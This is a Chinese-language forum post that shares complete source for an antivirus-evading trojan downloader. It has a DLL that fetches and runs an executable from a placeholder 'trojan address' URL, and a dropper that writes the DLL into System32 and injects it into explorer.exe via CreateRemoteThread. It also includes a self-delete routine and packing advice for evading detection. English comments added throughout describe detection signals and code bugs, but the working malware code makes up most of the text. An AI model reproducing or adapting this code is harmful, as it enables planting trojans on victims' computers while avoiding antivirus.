自寫的downloader代碼,免殺哦![原創(chuàng)]
看見大家都是到處發(fā)表教程,一時也心癢!我呢,不學無術(shù),哪里寫錯的地方請原諒!
首先的我的代碼是網(wǎng)上的,我自是平湊一下,在這里感謝原作者。
downloader網(wǎng)上也公布很多,但是大都是被kill了,這種常用的小工具最好自己編,才好免殺。
思路,運用一個dll插入線程,這樣就可以傳墻了。(呵呵)
步驟:
先寫個dll,這個我用lcc編寫:
//////////////////////////////////////////////////////////////////////////
#include <windows.h>
#include <urlmon.h>
DWORD WINAPI DLLDownMain (LPVOID lpNot);
/* Download source and destination, baked into the module as plain text.
 * DownURL's initialiser is the author's placeholder text (a string literal,
 * part of the binary); PathAndFileName is a bare file name with no directory,
 * so where the download lands depends on the current directory of whichever
 * process loaded this DLL (not of the dropper that wrote it).
 * Defender note: both buffers sit unencoded in the image and in the host
 * process's memory, so a file or memory scan can match on them directly. */
char DownURL[100] = {"換成木馬的地址"};
char PathAndFileName[100] = {"tnt.exe"};
/*
 * DllMain-style entry point (exported under the name LibMain).
 * On DLL_PROCESS_ATTACH it starts DLLDownMain on a new thread inside whatever
 * process loaded the module, and returns TRUE whether or not CreateThread
 * succeeded (a NULL hThread only breaks out of the switch). The thread handle
 * is never closed or waited on; the other three reasons are no-ops.
 * Defender note: "module loaded -> immediate CreateThread from DllMain ->
 * network and process-start activity" is the behaviour chain to hunt for.
 * Image-load telemetry for a non-Microsoft DLL written to System32 and then
 * loaded by explorer.exe (see the companion loader below) surfaces it.
 */
BOOL WINAPI __declspec(dllexport) LibMain(HINSTANCE hDLLInst, DWORD fdwReason, LPVOID lpvReserved)
{
DWORD ThreadID=0;
HANDLE hThread=NULL;
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
// Spawn the worker immediately on attach; nothing else in the host is awaited.
hThread=CreateThread(NULL,0,DLLDownMain,NULL,0,&ThreadID);
if (hThread==NULL)break;
// The DLL is being loaded for the first time by a given process.
// Perform per-process initialization here. If the initialization
// is successful, return TRUE; if unsuccessful, return FALSE.
break;
case DLL_PROCESS_DETACH:
// The DLL is being unloaded by a given process. Do any
// per-process clean up here, such as undoing what was done in
// DLL_PROCESS_ATTACH. The return value is ignored.
break;
case DLL_THREAD_ATTACH:
// A thread is being created in a process that has already loaded
// this DLL. Perform any per-thread initialization here. The
// return value is ignored.
break;
case DLL_THREAD_DETACH:
// A thread is exiting cleanly in a process that has already
// loaded this DLL. Perform any per-thread clean up here. The
// return value is ignored.
break;
}
// Always TRUE: a failed CreateThread does not make the load fail.
return TRUE;
}
/*
 * Worker thread body: fetches DownURL to PathAndFileName with
 * URLDownloadToFile and, only when that returns S_OK, starts the saved file
 * with WinExec. Returns 0 in every case; lpNot is unused. pDownURL and
 * pPathAndFileName are just aliases of the globals (pPathAndFileName is
 * assigned but never read; the call passes PathAndFileName directly).
 * Defender note: because this runs inside the host process, the HTTP request
 * and the later process start are attributed to that host (e.g. explorer.exe),
 * not to the dropper. The pair "process writes a new executable, then starts
 * it" and egress from a process that has no business fetching executables are
 * the events to correlate; blocking that egress stops the chain here.
 */
DWORD WINAPI DLLDownMain (LPVOID lpNot)
{
char *pDownURL = NULL;
char *pPathAndFileName = NULL;
pDownURL = DownURL;
pPathAndFileName =PathAndFileName;
// Download, then execute only on a clean S_OK (any other HRESULT is ignored).
if (URLDownloadToFile(0, pDownURL,PathAndFileName, 0, 0) == S_OK)
{
WinExec(PathAndFileName, SW_SHOW);
}
return 0;
}
///////////////////////////////////////////////////////////////////////////////
lcc編譯完,大小是5k左右!
然后把這個dll用exe2hex工具轉(zhuǎn)換成十六進制的文本。
編寫downloader的主體,我用vc編寫:
/////////////////////////////////////////////////////////////////////////////////
#include "stdafx.h"
#include<windows.h>
#include<stdio.h>
#include <psapi.h>
#include <shlobj.h>
#include <SHELLAPI.H>
#include <dll.h>
#pragma comment(lib,"psapi.lib")
#pragma comment(lib,"msvcrt.lib")
/* Linker directives: mark .text read/execute/write and fold .data and .rdata
 * into it, leaving a single RWX section that holds code and data together.
 * Defender note: one writable+executable section is a classic packer/loader
 * heuristic and is exactly what a section-flag check in a static scanner or
 * a PE triage script keys on; the text after the listing says the output is
 * additionally run through WinUpack, which compounds the signal. */
#pragma comment(linker, "/SECTION:.text,REW")
#pragma comment(linker, "/MERGE:.data=.text")
#pragma comment(linker, "/MERGE:.rdata=.text")
/* Forward declarations for the helpers defined below: remote-thread DLL
 * loader, process-name -> PID lookup, token privilege enable, and the
 * self-removal routine (only used if the call in WinMain is uncommented). */
int InjectDll(const char *FullName, const DWORD Pid);
DWORD ProcessToPID(const char *ProcessName, DWORD aPid[1024]);
int AddPrivilege(const char *Name);
BOOL SelfDelete(void);
/*
 * Dropper entry point.
 * 1. Builds "<system directory>\windll.dll" with strcat into a MAX_PATH+1
 *    buffer (no bounds check on the concatenation).
 * 2. Writes the embedded Dll_Data image (from dll.h) to that path with
 *    fopen("wb"). If the file cannot be opened it exits with 0, so a token
 *    that cannot write to System32 (typically a non-admin user) stops the
 *    whole chain at this step.
 * 3. Looks up the first process named EXPLORER.EXE (compared case-insensitively
 *    in ProcessToPID) and injects the dropped DLL into it; InjectDll's return
 *    value is discarded.
 * NOTE(review): the accompanying text claims the program exits if windll.dll
 * already exists; the code shown opens with "wb" and overwrites, so every run
 * rewrites the file. A file-create/modify event for an unsigned DLL in
 * System32 followed by explorer.exe loading that DLL is the detection pair.
 */
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
char achAim[MAX_PATH + 1];
const char *pszLibFileName = "windll.dll";// file name the embedded DLL is written under
const char DESTPROC[19] = "EXPLORER.EXE";// name of the process the DLL is injected into
GetSystemDirectory(achAim, sizeof(achAim));
strcat(achAim,"\\");
strcat(achAim,pszLibFileName);
FILE *fp;
// Drop the embedded image; failure to open (e.g. no write access) ends the run.
if ((fp = fopen(achAim, "wb")) != NULL)
{
fwrite(Dll_Data, sizeof(Dll_Data), 1, fp);
fclose(fp);
}else{
return 0;
}
//
DWORD Pid;
// NULL buffer: ProcessToPID returns the first matching PID, 0 if none.
if ((Pid = ProcessToPID(DESTPROC, NULL)) != 0)
{
InjectDll(achAim, Pid);
}
//SelfDelete();// remove the leading slashes to have the loader delete itself after running
return 0;
}
/*
 * Loads the DLL at FullName into process Pid by the classic remote-thread
 * technique: enable SeDebugPrivilege on our own token (AddPrivilege's return
 * value is ignored), OpenProcess with CREATE_THREAD|VM_OPERATION|VM_WRITE|
 * VM_READ, VirtualAllocEx a read/write buffer, WriteProcessMemory the path
 * into it, then CreateRemoteThread on kernel32!LoadLibraryA with that buffer
 * as the thread parameter.
 * Returns 0 once the remote thread is created, 1 on any failure. Neither
 * hRemoteProcess, hRemoteThread nor the remote allocation is released on any
 * path, and the thread is not waited on, so 0 does not mean the load finished.
 * Defender note: this four-call sequence against another process is what EDR
 * and Sysmon report directly -- a ProcessAccess event (ID 10) carrying these
 * access bits from the dropper to explorer.exe, then a CreateRemoteThread
 * event (ID 8) whose start address resolves to LoadLibraryA. The DLL path is
 * also copied into the target in clear text and can be recovered from its
 * memory for attribution.
 */
int InjectDll(const char *FullName, const DWORD Pid)
{
HANDLE hRemoteProcess;
// Opening a system-owned process requires SeDebugPrivilege on the caller's token.
AddPrivilege(SE_DEBUG_NAME);
if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | // allow remote thread creation
PROCESS_VM_OPERATION | // allow remote VM operations
PROCESS_VM_WRITE | // allow remote VM write
PROCESS_VM_READ, // allow remote VM read
0,
Pid)) == NULL)
{
return 1;
}
char *pDllName;
if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess,
NULL,
lstrlen(FullName) + 1,
MEM_COMMIT,
PAGE_READWRITE)) == NULL)
{
return 1;
}
// Copy the DLL path into the remote process's address space with WriteProcessMemory.
if (WriteProcessMemory(hRemoteProcess,
pDllName,
(void *)FullName,
lstrlen(FullName),
NULL) == 0)
{
return 1;
}
// Resolve the LoadLibraryA entry point; kernel32 is mapped at the same address in the target.
PTHREAD_START_ROUTINE pfnStartAddr;
if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)
{
return 1;
}
HANDLE hRemoteThread;
DWORD ThreadId;
if ((hRemoteThread = CreateRemoteThread(hRemoteProcess, // target process
NULL,
0,
pfnStartAddr, // LoadLibraryA entry point
pDllName,
0,
&ThreadId)) == NULL)
{
return 1;
}
return 0;
}
/*
 * Finds processes whose first-module base name equals ProcessName (stricmp,
 * so the comparison is case-insensitive). The psapi routines are resolved at
 * run time with GetProcAddress even though psapi.lib is also linked above, so
 * EnumProcesses/EnumProcessModules/GetModuleBaseNameA do not appear in the
 * import table -- only as the string literals below. A static scanner should
 * therefore look for these API names as data, not as imports.
 * Behaviour: with aPid == NULL, returns the PID of the first match, or 0 if
 * none. With a buffer, appends every match to aPid[] and returns aPid[0]
 * (which is whatever the caller left there if nothing matched); j is never
 * checked against the 1024-entry buffer. Handles for non-matching PIDs are
 * not closed inside the loop; the CloseHandle after the loop acts on the last
 * hProcess only, which may be NULL or already closed.
 * Defender note: enumerating every PID and opening each with
 * PROCESS_QUERY_INFORMATION|PROCESS_VM_READ produces a burst of ProcessAccess
 * events from one process to every other process on the host, which is itself
 * a usable signal independent of the injection that follows.
 */
DWORD ProcessToPID(const char *ProcessName, DWORD aPid[1024])
{
typedef BOOL (CALLBACK* EnumProcessesType)(DWORD *,DWORD,DWORD *);
typedef BOOL (CALLBACK* EnumProcessModulesType)(HANDLE,HMODULE *,DWORD,LPDWORD);
typedef DWORD (CALLBACK* GetModuleBaseNameType)(HANDLE, HMODULE, LPTSTR, DWORD);
EnumProcessesType EnumProcesses;
EnumProcessModulesType EnumProcessModules;
GetModuleBaseNameType GetModuleBaseName;
// Reuse psapi.dll if already mapped, otherwise load it; freed before every return.
HMODULE hmPsapi = GetModuleHandle("psapi.dll");
if (hmPsapi == NULL)
{
if ((hmPsapi = LoadLibrary("psapi.dll")) == NULL)
{
return 0;
}
}
EnumProcesses = (EnumProcessesType)GetProcAddress(hmPsapi, "EnumProcesses");
EnumProcessModules = (EnumProcessModulesType)GetProcAddress(hmPsapi, "EnumProcessModules");
GetModuleBaseName = (GetModuleBaseNameType)GetProcAddress(hmPsapi, "GetModuleBaseNameA");
if (!(EnumProcesses &&
EnumProcessModules &&
GetModuleBaseName))
{
FreeLibrary(hmPsapi);
#ifdef _DEBUG
printf("GetProcAddress() error : %d\n", GetLastError());
#endif
return 0;
}
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i , j;
HANDLE hProcess;
HMODULE hMod;
char szProcessName[MAX_PATH] = "UnknownProcess";
// Count the live processes; aProcesses[] receives the valid PIDs (at most 1024).
if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
{
#ifdef _DEBUG
printf("EnumProcesses() error : %d\n", GetLastError());
#endif
FreeLibrary(hmPsapi);
return 0;
}
cProcesses = cbNeeded / sizeof(DWORD);
// Walk every valid PID.
for ( i = 0, j = 0; i < cProcesses; i++ )
{
// Open the process for this PID.
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE,
aProcesses[i]);
// Fetch the name of the process's first module.
if ( hProcess )
{
if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
{
GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName));
// Compare against the requested name; on a match return or record the PID.
if(!stricmp(szProcessName, ProcessName))
{
CloseHandle( hProcess );
// With a receive buffer, collect every match; without one, return the first.
if (aPid != NULL)
{
aPid[j++] = aProcesses[i];
}
else
{
FreeLibrary(hmPsapi);
return aProcesses[i];
}
}
}
}
}
CloseHandle( hProcess );
if (aPid != NULL)
{
FreeLibrary(hmPsapi);
return aPid[0];
}
FreeLibrary(hmPsapi);
return 0;
}
/*
 * Enables the named privilege (called above with SE_DEBUG_NAME) on the
 * current process token. Returns 0 when AdjustTokenPrivileges returns
 * nonzero, 1 when OpenProcessToken, LookupPrivilegeValue or
 * AdjustTokenPrivileges fails. AdjustTokenPrivileges returns nonzero even
 * when the privilege was not actually assigned (GetLastError() ==
 * ERROR_NOT_ALL_ASSIGNED), and that is not checked here, so 0 does not
 * guarantee the privilege is held. hToken is never closed.
 * Defender note: by default a standard-user token does not carry
 * SeDebugPrivilege, so this only changes anything when the dropper already
 * runs elevated; "Sensitive Privilege Use" auditing records the attempt.
 */
int AddPrivilege(const char *Name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID Luid;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken))
{
return 1;
}
if (!LookupPrivilegeValue(NULL,Name,&Luid))
{
return 1;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = Luid;
// Nonzero return here only means the call was processed, not that the privilege was granted.
if (!AdjustTokenPrivileges(hToken,
0,
&tp,
sizeof(TOKEN_PRIVILEGES),
NULL,
NULL))
{
return 1;
}
return 0;
}
/*
 * Deletes the running executable by launching "%COMSPEC% /c del <short path>
 * > nul" through ShellExecuteEx while this process is raised to REALTIME
 * priority and the child is dropped to IDLE, so the delete runs once this
 * image has exited. Returns TRUE if the shell was launched, FALSE if any
 * path lookup or ShellExecuteEx failed. szParams is filled with
 * lstrcpy/lstrcat into a MAX_PATH buffer with no length check, and sei is
 * not zero-initialised (members not assigned below are indeterminate).
 * Only reachable if the commented-out call in WinMain is restored.
 * Defender note: process-creation logging shows cmd.exe with a "/c del ...
 * > nul" command line whose parent exits almost immediately, and the
 * REALTIME_PRIORITY_CLASS request is another oddity worth a rule;
 * SHChangeNotify only tells the shell the file is gone.
 */
BOOL SelfDelete(void)
{
SHELLEXECUTEINFO sei;
TCHAR szModule [MAX_PATH],
szComspec[MAX_PATH],
szParams [MAX_PATH];
// get file path names
if((GetModuleFileName(0,szModule,MAX_PATH)!=0) &&
(GetShortPathName(szModule,szModule,MAX_PATH)!=0) &&
(GetEnvironmentVariable("COMSPEC",szComspec,MAX_PATH)!=0))
{
// create comspec parameters
lstrcpy(szParams,"/c del "); // run a single command to...
lstrcat(szParams, szModule); // del(ete) module file and...
lstrcat(szParams, " > nul"); // output results to nowhere
// set struct members
sei.cbSize = sizeof(sei);
sei.hwnd = 0;
sei.lpVerb = "Open";
sei.lpFile= szComspec;
sei.lpParameters = szParams;
sei.lpDirectory = 0;
sei.nShow = SW_HIDE;
sei.fMask = SEE_MASK_NOCLOSEPROCESS;
// give all CPU cycles to current process
SetPriorityClass(GetCurrentProcess(),REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_TIME_CRITICAL);
// execute command shell
if(ShellExecuteEx(&sei))
{
// freeze command shell process
SetPriorityClass(sei.hProcess,IDLE_PRIORITY_CLASS);
SetProcessPriorityBoost(sei.hProcess,TRUE);
// notify explorer shell of deletion
SHChangeNotify(SHCNE_DELETE,SHCNF_PATH,szModule,0);
return TRUE;
}
else
{
// otherwise, restore normal priority
SetPriorityClass(GetCurrentProcess(),NORMAL_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(),THREAD_PRIORITY_NORMAL);
}
}
return FALSE;
}
//////////////////////////////////////////////////////////////////////////////////
這里的<dll.h>的頭文件就是上邊的dll十六進制的文本,把他放在一個Dll_Data的數(shù)組內(nèi),這樣編譯會有“4 warning”,可以不必理會,大小約16k,然后再用
WinUpack.exe壓縮,最后生成的文件大小是4k左右!
這個exe運行后會在system32目錄下生成一個windll.dll(可以改)的文件,同時把dll文件插入線程,如果系統(tǒng)下已經(jīng)有windll.dll文件,就自動退出,避免重復種木馬。
呵呵,我的語文水平不高,有什么不理解的地方到pcshare官方交流群里提問吧!